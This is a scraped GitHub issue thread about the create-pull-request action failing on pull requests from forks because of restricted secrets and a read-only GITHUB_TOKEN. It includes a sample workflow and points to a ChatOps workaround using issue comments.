Comments (8)
Yes, exactly. There are currently restrictions on events triggered by a pull request being opened from a fork. In fact, the restrictions are on any events triggered by a forked repository.
Restrictions on forked repositories
My understanding of the restrictions so far:
-
Events from forks cannot access secrets, except for for the default
GITHUB_TOKEN
.With the exception of GITHUB_TOKEN, secrets are not passed to the runner when a workflow is triggered from a forked repository.
-
The
GITHUB_TOKEN
has read-only access when an event is triggered by a forked repository.
ref: https://help.github.com/en/actions/automating-your-workflow-with-github-actions/authenticating-with-the-github_token#permissions-for-the-github_token
There are a couple of posts on the community forums about this issue and with confirmation from GitHub staff that they are trying to implement a security model that would allow it.
https://github.community/t5/GitHub-Actions/Can-t-push-to-forked-repository-on-the-original-repository-s/m-p/35916/highlight/true#M2372
https://github.community/t5/GitHub-Actions/Github-Workflow-not-running-from-pull-request-from-forked/m-p/37990/highlight/true#M3180
What that means for create-pull-request action
Currently, if the event was triggered by a forked repository, it cannot commit changes because the GITHUB_TOKEN
is read-only. I've not even tried to implement it, so it actually fails before then when it tries to checkout the head branch.
On the todo list:
- (done)
Add better handling to catch this case and present an understandable message - (done)
Consider if the action should exit silently in this particular case - Write something in the README as a general explanation of what to expect when using the action with pull request events
- Add the ability to open a PR against a fork in future if it becomes possible. (Although I'm not sure if this is a use case anyone would want)
I think the use cases for using create-pull-request action during an on: pull_request
event are slim anyway. What happens during those events is this:
- The
actions/checkout
action by default checks out a merge commit between the head branch and the base. - create-pull-request action can't do anything with that merge commit, so it scraps it and checks out the head branch instead. (This is where it fails currently if the PR was raised from a fork)
- If changes that were made on top of the merge commit before the action ran create a diff, the changes are committed to a new branch and a pull request raised with the base being the head branch of the original pull request. i.e.
new-branch
-->head_branch
. Then the idea is that you would merge that new pull request into the first one before merging that.
The above all works fine for pull requests raised within a repository (non-fork PRs), but I think there are very few real use cases where you would want to do that kind of workflow.
The only other workflow I've seen work with on: pull_request
and create-pull-request action is where the event is just being used to trigger the workflow for a completely different base. It doesn't make a lot of sense to do this because it's not really testing anything in the pull request, but it works. The following workflow is an example. It fixes the base to master
by making sure it's checked out by actions/checkout
before the changes are made, and then setting base: master
on create-pull-request action.
on:
push:
branches:
- master
pull_request:
branches:
- master
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
with:
ref: master
- run: <something that creates a diff>
- name: Create Pull Request
uses: peter-evans/[email protected]
with:
token: ${{ secrets.GITHUB_TOKEN }}
branch-suffix: none
base: master
If in doubt I would advise just removing the pull_request
event from a workflow that uses create-pull-request action.
from create-pull-request.
I released a new version of the action today that gracefully handles pull request events triggered by forks. The action will report success
but issue a warning that it couldn't handle the event.
from create-pull-request.
Hrmm so if I change the trigger to an issue comment for “chatops” will it change the scope of permissions?
I'm currently investigating the same idea as a workaround for some operations. I've not got a complete solution that I'm satisfied with yet, but what I have discovered is that the GITHUB_TOKEN
can be used to commit in issue_comment
events even when triggered by a user that doesn't have write access to the repository. I think the reason this is possible is because issue_comment
events can only execute code that has been committed by users with write access to the repository. That differs from pull_request
because users without write access could potentially inject code via the PR to be executed by the workflow.
So yes, I'm fairly sure the scope of permissions for issue_comment
events will allow "chatops" without restrictions.
from create-pull-request.
Yes, very soon I'm going to publish a ChatOps solution I've been working on.
from create-pull-request.
Thanks @peter-evans ! Your GitHub action is a “master class” in learning actions. That truly is a shame that we can’t use this action (or basically any action) on forks. As 99% of our projects are open source I am really struggling to accomplish many of the things I want to do. Hrmm so if I change the trigger to an issue comment for “chatops” will it change the scope of permissions?
from create-pull-request.
@peter-evans any conclusions? =)
from create-pull-request.
I've released an action called slash-command-dispatch that facilitates "ChatOps" with GitHub Actions.
There is a demo here that shows how this solution can be used to run workflows against pull requests.
from create-pull-request.
I've released v2
, a major version update. As part of this release I've summarised the main gist of my explanation of this issue in a new document here.
There are no changes to the approach. My recommendation is to use slash-command-dispatch to perform operations on pull requests.
Closing this issue for now.
from create-pull-request.
Related Issues (20)
- Is it possible to fully restore all git state after the action? HOT 5
- Deep fetch results in massive download HOT 2
- Question about Repository HOT 1
- Provide a 'commit-message-body' field? HOT 3
- Failing to create PR using example HOT 1
- Base branch being commited with changes from branch HOT 1
- Failing to create PR HOT 1
- Action does not seem to produce outputs when adding sleep step in between
- Telegram HOT 2
- Support for gitea pull request ? HOT 2
- Add permissions to example in README HOT 2
- PR Creation does not take place despite the step running with success HOT 5
- Unable to use pr number output HOT 1
- PR creation failing due to fetch failing HOT 32
- Add color to labels HOT 1
- push only with --force-with-lease HOT 2
- Breaking change with v6: Error: GitHub Actions is not permitted to create or approve pull requests. HOT 2
- Support converting PR back to draft HOT 1
- Change the authorship of pull requests HOT 1
- Cannot read properties of undefined (reading 'number') HOT 7
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from create-pull-request.